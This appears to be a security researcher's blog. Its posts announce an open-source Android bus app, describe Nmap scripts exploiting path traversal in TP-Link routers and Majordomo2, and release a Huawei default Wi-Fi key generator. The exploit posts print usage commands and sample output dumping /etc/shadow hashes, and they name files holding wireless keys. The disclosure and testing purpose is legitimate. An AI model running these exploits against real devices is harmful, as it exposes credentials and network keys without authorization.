Code

bcbus goes open source

by calderpwn on Sat, Sep 01 2012 15:40:00

BCBus is an Android application I developed to have BCTransit's schedules on my phone for offline access. BCBus is my first Android project and a very important part of my learning experience with the Android OS as I had to play around with layouts, intents, async tasks, row views, sqlite interaction and memory optimization.

Going open-source

I've been living in México for over a year now and I simply no longer have the required time to maintain and update this application. For this reason I'd like to share the code with the world and maybe someone will find it useful and learn from it. I also encourage anyone who might be interested in picking up this project to reach out to me for more information.

Existing paid users

Since it wouldn't be fair to you, I will keep the schedules of your current cities up to date. Please contact me to let me know if you are having issues with any of the schedules.

Github repository

BCBus on GitHub

Special credits

  • Renata Gomez for helping me with the dashboard icons

  • Guenther Beyer from androidicons.com for helping me with the design of an awesome icon and graphics for the dashboard

  • CBC for interviewing me on one of their radio shows and helping me spread the word.

http-tplink-dir-traversal

by Paulino Calderon on Tue, Jul 10 2012 05:18:00

I wrote an NSE script to exploit a path traversal vulnerability in several TP-Link access points.

description = [[
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate any help confirming the vulnerability in other models.
Advisory:
* http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
Other interesting files:
* /tmp/topology.cnf (Wireless configuration)
* /tmp/ath0.ap_bss (Wireless encryption key)
]]
---
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target>
--
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | http-tplink-dir-traversal:
-- | VULNERABLE:
-- | Path traversal vulnerability in several TP-Link wireless routers
-- | State: VULNERABLE (Exploitable)
-- | Description:
-- | Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
-- | This vulnerability can be exploited remotely and without authentication.
-- | Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
-- | Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
-- | Disclosure date: 2012-06-18
-- | Extra information:
-- | /etc/shadow :
-- |
-- | root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- | Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- | bin::10933:0:99999:7:::
-- | daemon::10933:0:99999:7:::
-- | adm::10933:0:99999:7:::
-- | lp:*:10933:0:99999:7:::
-- | sync:*:10933:0:99999:7:::
-- | shutdown:*:10933:0:99999:7:::
-- | halt:*:10933:0:99999:7:::
-- | uucp:*:10933:0:99999:7:::
-- | operator:*:10933:0:99999:7:::
-- | nobody::10933:0:99999:7:::
-- | ap71::10933:0:99999:7:::
-- |
-- | References:
-- |_ http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
--
-- @args http-tplink-dir-traversal.rfile Remote file to download. Default: /etc/passwd
-- @args http-tplink-dir-traversal.outfile If set it saves the remote file to this location.


Resources

http-tplink-dir-traversal on Github

dotdotpwn log


Exploiting Majordomo2 with Nmap

by Paulino Calderon on Tue, Jun 28 2011 18:42:00

This is my Nmap script http-majordomo2-dir-traversal; it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it :)

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
|
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

  • http-majordomo2-dir-traversal.rfile - Remote file to download. Default: /etc/passwd
  • http-majordomo2-dir-traversal.uri - URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
  • http-majordomo2-dir-traversal.outfile - If set it saves the remote file to this location.


Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse
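Both the TP-Link script above and this Majordomo2 script read files through path traversal. As an added example (not code from either script or from this blog), here is a small Python checker a defender can run over web server access logs to flag such requests, including URL-encoded and double-encoded variants, while ignoring names that merely contain two dots. The log lines and the `topic` query parameter are constructed for illustration, not taken from the advisories.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2012:05:18:00 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [10/Jul/2012:05:18:01 +0000] "GET /help/../../../../etc/shadow HTTP/1.1" 200 731
10.0.0.7 - - [10/Jul/2012:05:18:02 +0000] "GET /help/..%2F..%2F..%2Ftmp%2Ftopology.cnf HTTP/1.1" 200 402
10.0.0.9 - - [10/Jul/2012:05:18:03 +0000] "GET /cgi-bin/mj_wwwusr?topic=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1203
10.0.0.5 - - [10/Jul/2012:05:18:04 +0000] "GET /docs/..intro.html HTTP/1.1" 200 88
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Files the two advisories mention as targets of the traversal.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/tmp/topology.cnf", "/tmp/ath0.ap_bss")

def normalize(target: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (catches double encoding), then unify slashes."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.replace("\\", "/")

def traversal_findings(target: str) -> dict:
    """Count '..' path segments and spot known sensitive files in the decoded target."""
    norm = normalize(target)
    # Treat query delimiters as separators so '..' inside parameters is seen too.
    segments = norm.replace("?", "/").replace("=", "/").replace("&", "/").split("/")
    dotdot = sum(1 for s in segments if s == "..")  # '..intro.html' is not a traversal
    hit = next((f for f in SENSITIVE if f in norm), None)
    return {"normalized": norm, "dotdot": dotdot, "sensitive": hit}

def scan_log(text: str) -> list:
    """Return one alert per request that traverses or names a sensitive file."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        f = traversal_findings(m["target"])
        if f["dotdot"] or f["sensitive"]:
            # A 200 status alongside a traversal suggests the file was actually served.
            alerts.append({"ip": m["ip"], "status": int(m["status"]), "target": m["target"], **f})
    return alerts
```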

WhatAreMyHosts.com - IP to hostnames

by Paulino Calderon on Sat, Jun 04 2011 06:11:00

I created a small web application that uses Bing's results to list all the hostnames pointing to an IP address. This is useful for pentesting services like HTTP servers that behave according to the hostname used. Don't abuse it ;) 

http://whataremyhosts.com

WEP/WPA key generator for Huawei gateways

by Paulino Calderon on Sat, Jan 22 2011 00:43:00

We are proud to release our WEP/WPA default key generator for Huawei HG520x and HG530 Gateways. These devices use a weak cipher to generate their default keys and Humberto Ochoa, one of our vulnerability researchers at Websec, did a great job deciphering the algorithm:

Mac2wepkey - WEP/WPA default key generator for Huawei HG250x and HG530 Gateways

Ironically, Prodigy Telmex, the biggest ISP in Mexico, just replaced my old 2wire router with one of these vulnerable modems, a newer and "better" device (According to their technician of course hehe). 
